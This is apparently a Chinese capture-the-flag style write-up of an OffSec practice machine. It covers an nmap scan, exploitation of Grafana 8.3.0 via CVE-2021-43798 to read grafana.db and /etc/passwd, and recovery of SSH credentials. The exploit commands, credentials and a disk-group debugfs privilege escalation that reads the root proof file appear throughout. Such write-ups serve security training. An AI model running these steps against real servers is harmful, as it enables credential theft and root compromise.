主要知识点

• CVE-2021-43798漏洞利用

具体步骤

执行nmap 扫描，22/3000/9090端口开放，应该是ssh,grafana 和Prometheus

Nmap scan report for 192.168.52.181
Host is up (0.00081s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c1:99:4b:95:22:25:ed:0f:85:20:d3:63:b4:48:bb:cf (RSA)
|   256 0f:44:8b:ad:ad:95:b8:22:6a:f0:36:ac:19:d0:0e:f3 (ECDSA)
|_  256 32:e1:2a:6c:cc:7c:e6:3e:23:f4:80:8d:33:ce:9b:3a (ED25519)
3000/tcp open  ppp?
9090/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
| http-title: Prometheus Time Series Collection and Processing Server
|_Requested resource was /graph

访问3000端口,Grafana的版本是8.3.0

 

查询相关信息，得知该版本grafana有任意文件读取漏洞 CVE-2021-43798,下面两个exp比较有用分别下载

 

首先利用https://github.com/taythebot/CVE-2021-43798下载 grafana.db文件，用sqlite 打开后，执行sql语句查询，得到加密的密码和用户名，虽然也能得到Grafana的登录密码，不过我没能破解，无法登录

go run exploit.go -target http://192.168.116.181:3000 -dump-database -output grafana.db

下载 /etc/passwd文件，发现basic_auth_user对应的值存在于/etc/passwd文件中，虽然不太了解Prometheus的工作原理，不过猜这是一个服务器登录密码

go run exploit.go -target http://192.168.116.181:3000 -file /etc/passwd

利用另一个https://github.com/jas502n/Grafana-CVE-2021-43798 破解密码,把dataSourcePassword换成上图中的secure_json_data里对应的dbasicAuthPassword,至于grafanaInI-secretKey,也可以用上一个exp 下载default.ini对比是否一致。

利用sysadmin / SuperSecureP@ssw0rd 登录 ssh,发现用户属于disk group，可以从

https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe 得到如何利用disk group提权

C:\home\kali\Documents\OFFSEC\WarmUp\Fanatastic\CVE-2021-43798-main> ssh sysadmin@192.168.116.181
sysadmin@192.168.116.181's password: 
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-97-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantageSystem information as of Sun 06 Oct 2024 09:08:05 AM UTCSystem load:  0.0               Processes:               209Usage of /:   63.6% of 9.78GB   Users logged in:         0Memory usage: 33%               IPv4 address for ens160: 192.168.116.181Swap usage:   1%94 updates can be applied immediately.
To see these additional updates run: apt list --upgradableFailed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings*** System restart required ***
Last login: Sun Oct  6 08:42:36 2024 from 192.168.251.116
$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin),6(disk)
$ 

得到root flag

$ df -h
Filesystem      Size  Used Avail Use% Mounted on
udev            445M     0  445M   0% /dev
tmpfs            98M  1.2M   97M   2% /run
/dev/sda2       9.8G  6.3G  3.1G  68% /
tmpfs           489M     0  489M   0% /dev/shm
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           489M     0  489M   0% /sys/fs/cgroup
/dev/loop1       56M   56M     0 100% /snap/core18/2284
/dev/loop2       62M   62M     0 100% /snap/core20/1328
/dev/loop3       56M   56M     0 100% /snap/core18/2128
/dev/loop0       68M   68M     0 100% /snap/lxd/21835
/dev/loop5       44M   44M     0 100% /snap/snapd/14549
/dev/loop6       71M   71M     0 100% /snap/lxd/21029
/dev/loop4       33M   33M     0 100% /snap/snapd/12883
tmpfs            98M     0   98M   0% /run/user/1001
$ debugfs /dev/sda2
debugfs 1.45.5 (07-Jan-2020)
debugfs:  cat /root/proof.txt
15758e8809427f941edb685bb6d2a9c7
debugfs: